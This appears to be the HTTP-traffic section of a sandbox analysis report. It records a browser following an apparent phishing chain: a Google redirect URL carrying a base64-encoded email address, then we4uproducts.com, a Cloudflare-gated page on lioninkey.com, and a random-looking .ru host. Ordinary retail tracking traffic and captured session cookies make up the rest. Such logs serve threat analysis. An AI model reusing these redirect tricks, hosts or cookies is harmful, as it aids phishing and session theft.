Source: global trafficHTTP traffic detected: GET /html/assets/img_community-logo.svg HTTP/1.1Host: community.sephora.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.sephora.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AKA_A2=A
Source: global trafficHTTP traffic detected: GET /html/assets/img_community-logo.svg HTTP/1.1Host: community.sephora.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AKA_A2=A
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+7WnBV4zh2d+Rfg&MD=NKxfPlDA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1Host: www.google.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=tbZltSS-ulb9hDMV483oGfGLzq9j5eQ_Lz3xgGuo2HplK-9dWyUDX1UAgdkKhCqBLJ1JA0oEqNH7LE4HyA9XgAkADuoouDlbt5_7NR1zyqwYe9ITMZcbLxWJLd-qEkGXL_VzCHNnLRCkcObT51Q8AEsNfdJaKLuwuwpafH4F64woDjeaOjneF7P-R3nQkMs
Source: global trafficHTTP traffic detected: GET /amp/we4uproducts.com/cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1Host: www.google.co.ukConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=tbZltSS-ulb9hDMV483oGfGLzq9j5eQ_Lz3xgGuo2HplK-9dWyUDX1UAgdkKhCqBLJ1JA0oEqNH7LE4HyA9XgAkADuoouDlbt5_7NR1zyqwYe9ITMZcbLxWJLd-qEkGXL_VzCHNnLRCkcObT51Q8AEsNfdJaKLuwuwpafH4F64woDjeaOjneF7P-R3nQkMs
Source: global trafficHTTP traffic detected: GET /6ysw/ HTTP/1.1Host: fkmd.lioninkey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://we4uproducts.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJhYXArdXlCalZsZlhTd1N4eTNUOFE9PSIsInZhbHVlIjoicnlzNFNWN2RKRks0cHAvcHg0aVBBK2ZncnZBdzBKU09yeG5SVm0rZFc5ejJ0eVdBbEFjdFpjUWZXNCtVOWFOZ2ZURVB6OFlhdUVEcW5tdkhlUFVub2ptWDloYXM0ZGlVOVhOUFVUTWZSY1FublBMZndIK0NNdnNWMGZEQ2ZoQTMiLCJtYWMiOiI2ZWY3NjJlZWI3OTA2ZWViMGMyNTRjODE3MDIzOTYyNzQzMzgyNmEzMjcxY2ZhOTA5NTljNDEyNjY4ZDgxM2QyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkMyREpkMFVPTWR1aEI3bUZSMnc0NXc9PSIsInZhbHVlIjoiN215UFpuYzhHc05KZ1FZTWNKMU5YN1dNL2tWb1dXcmNaalJKckpDcys2MU53SVZiZmVRengwQmNGaVVYWmc5bWErQUpkT3QwVjlaMkVpNUxHbW1BYnR0dHpjTVlCWUdEcC9nVjA5UCtCSWVoTUZSNGUxdnJ5LzRzT0g1RG5vaksiLCJtYWMiOiJmYmFlMTk0NTg2MmE2Zjg5YjA0Yzk5MDM5M2JhNDJmNmFkZTY2ZGJkN2E4ZDQxMDdjM2M2YjhiYjlkMGZjM2JlIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7d4685edbf2e64&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7d4685edbf2e64&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7d4685edbf2e64/1729807604264/bGQz0E0r8tNdFNx HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7d4685edbf2e64/1729807604265/363bbcac171fc49723b606fe2c3bbae6643d39b01f80c6b29a6166b7a496e152/LVj0GcfZqK1x_oC HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7d4685edbf2e64/1729807604264/bGQz0E0r8tNdFNx HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /51494063466197438770eThrqYWGTFQAZGGVGCSLIRTIMTBZBRPYKHCCIVWRHXDMIQJYU HTTP/1.1Host: r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://fkmd.lioninkey.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /51494063466197438770eThrqYWGTFQAZGGVGCSLIRTIMTBZBRPYKHCCIVWRHXDMIQJYU HTTP/1.1Host: r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1729807632848 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://www.asos.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1729807632848 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://www.asos.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=16215612898763276402808192961366232505
Source: global trafficHTTP traffic detected: GET /dest5.html?d_nsid=undefined HTTP/1.1Host: asos.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=16215612898763276402808192961366232505
Source: global trafficHTTP traffic detected: GET /id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1729807632848 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=16215612898763276402808192961366232505
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=3.3.0&d_fieldgroup=A&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&mid=16517622310589015242779979940996246389&ts=1729807635045 HTTP/1.1Host: metrics.asos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://www.asos.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: geocountry=US; bm_sz=66435E81E02E031738C051A9C8A74AF3~YAAQF/AQAsZeXK+SAQAAPMKRwBmbT1ort/PqojSUhpdsyHRIfHwsQUxvVepaTsNYtWsG1Dl/xJqL+CVPH+iigYMT7vVUY1stUT+KiywrgeEluljLSKNdUVBoafeQKYHgt5gK1cPPBUCroecFDNTYLbgLqxCba7/3lOOaBEs+uIoGJVa4hsi3ovF8uyVOFeRdHfABs/MIPbhRAl956CgROvYu36x0zeq24E97kGOtElsnp0cU4WGYbqXdHakBub5G3QZLjufqAJjCchWDhFLkSS27DaUY6c0AiG6lcCCuuvVmcH6ZrAvvIJWhIF1NjLTb+N7sRGZEna6vEj4VhOR5aU6iYRaH35OfGS3352Z2fs8P+meV/Tr1u75lasHr0ICGeiU=~3490353~4536372; s_pers=%20eVar225%3D1%7C1729809432855%3B%20s_vnum%3D1730433600857%2526vn%253D1%7C1730433600857%3B%20s_invisit%3Dtrue%7C1729809432857%3B%20visitCount%3D1%7C1729809432866%3B; _abck=78BB01D303A00543970FBC58A9F5D796~-1~YAAQF/AQAv5eXK+SAQAAzNCRwAz1EQetbN0ZgQmgvP0WaTQw8QOKRtZG0rIGe7lWjHyroAspp8Gj1XhtFuHidQmnpD42BSXX9CRd+adEtgdMQhZkklufnjCL/8bn371kB7uXvifhtiuqyxLQODidPx3dbDxj+Da4u9EasZaUPJjd4ZvOr0gWR/BoN6wZe2kbLTbsMfhEx9E2thnQWihK+vN5Y3HV7b2mVv3fFMQLzyC/0swr2431Bh8rSlF65d8akI0MvGTFZYf9FkPaYvu0o+GQ/Rt7BaYsW2BZUVuxEXiU8zIiW4j3iLRsINVpT6D8VLRXyi7Bai5jL1J+iggHrOJDrlJ99QeTJ+sYWiaVWTMSGA09d4hzoDpiI1zSvyyRkYsROw7jVfzqggFXz4yAqjy+BVs4Iaj9PxLSmImp7NovmKaTw15QLPSgIZ+QrUdFZo6jOI04pji30jDQ4RT4Vg==~-1~-1~-1; RT="z=1&dm=asos.com&si=2a741c90-c15a-4741-ad5f-9ff5e6d0d0dd&ss=m2nussgu&sl=0&tt=0&bcn=%2F%2F684dd329.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; AMCV_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=-1303530583%7CMCMID%7C16517622310589015242779979940996246389%7CMCAAMLH-1730412435%7C6%7CMCAAMB-1730412435%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCCIDH%7C0%7CMCOPTOUT-1729814835s%7CNONE%7CvVersion%7C3.3.0
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=3.3.0&d_fieldgroup=A&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&mid=16517622310589015242779979940996246389&ts=1729807635045 HTTP/1.1Host: metrics.asos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: geocountry=US; bm_sz=66435E81E02E031738C051A9C8A74AF3~YAAQF/AQAsZeXK+SAQAAPMKRwBmbT1ort/PqojSUhpdsyHRIfHwsQUxvVepaTsNYtWsG1Dl/xJqL+CVPH+iigYMT7vVUY1stUT+KiywrgeEluljLSKNdUVBoafeQKYHgt5gK1cPPBUCroecFDNTYLbgLqxCba7/3lOOaBEs+uIoGJVa4hsi3ovF8uyVOFeRdHfABs/MIPbhRAl956CgROvYu36x0zeq24E97kGOtElsnp0cU4WGYbqXdHakBub5G3QZLjufqAJjCchWDhFLkSS27DaUY6c0AiG6lcCCuuvVmcH6ZrAvvIJWhIF1NjLTb+N7sRGZEna6vEj4VhOR5aU6iYRaH35OfGS3352Z2fs8P+meV/Tr1u75lasHr0ICGeiU=~3490353~4536372; s_pers=%20eVar225%3D1%7C1729809432855%3B%20s_vnum%3D1730433600857%2526vn%253D1%7C1730433600857%3B%20s_invisit%3Dtrue%7C1729809432857%3B%20visitCount%3D1%7C1729809432866%3B; RT="z=1&dm=asos.com&si=2a741c90-c15a-4741-ad5f-9ff5e6d0d0dd&ss=m2nussgu&sl=0&tt=0&bcn=%2F%2F684dd329.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; _abck=78BB01D303A00543970FBC58A9F5D796~-1~YAAQC/AQAvDVW6+SAQAAbteRwAxnBLtDzc+2YIcn7Ymp4ISiOCCB9s+MWpxwlqJaLok6X4nZlPYMgIZKNc+4LLiysol0lKhFcL8yAYlu/E7hcG8agGno+10AAs1X0BuBJLhQS9+FGZ6YxV0UFlN7Sk0lF5QKu2k2tB8cw7RzKP2eTLDUn2PlRURJ/pE9Y1Ke+Evf9xvo4d01DK4pNpndfosZVl/sRfJSKibPKoxc1xMjtpf5A/ABhNeDx2nmwc8/c5BQ2Novyo/WphDrmE/dmffk1O6DQmEC7D7AHGp/MeWlsrWfHsU9dj5tJLSPA5NT3bei4y3yEvPY/TOtQl4tZvp8zQVgZQ/RQHn7LPg0xytg4NyAds6FePLcEYnbOLNl9xOCQA9mHh3JLrumgGIkzdNr7xX1YYbhVqydcG5leoBdLEXqZjBTWCXhT/s4I2MPxzH2iyADhwXowFleEC/f7A==~-1~-1~-1; s_ecid=MCMID%7C16517622310589015242779979940996246389; AMCV_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=-1303530583%7CMCMID%7C16517622310589015242779979940996246389%7CMCAAMLH-1730412435%7C6%7CMCAAMB-1730412435%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCCIDH%7C0%7CMCOPTOUT-1729814835s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C3.3.0
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=3.3.0&d_fieldgroup=AAM&d_rtbd=json&d_ver=2&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&d_mid=16517622310589015242779979940996246389&d_blob=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&ts=1729807636417 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://www.asos.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=16215612898763276402808192961366232505
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=3.3.0&d_fieldgroup=AAM&d_rtbd=json&d_ver=2&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&d_mid=16517622310589015242779979940996246389&d_blob=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&ts=1729807636417 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=16215612898763276402808192961366232505
Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=ZxrFJQAAAFqFsAN- HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=16215612898763276402808192961366232505
Source: global trafficHTTP traffic detected: GET /js/19181552552.js HTTP/1.1Host: cdn.optimizely.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
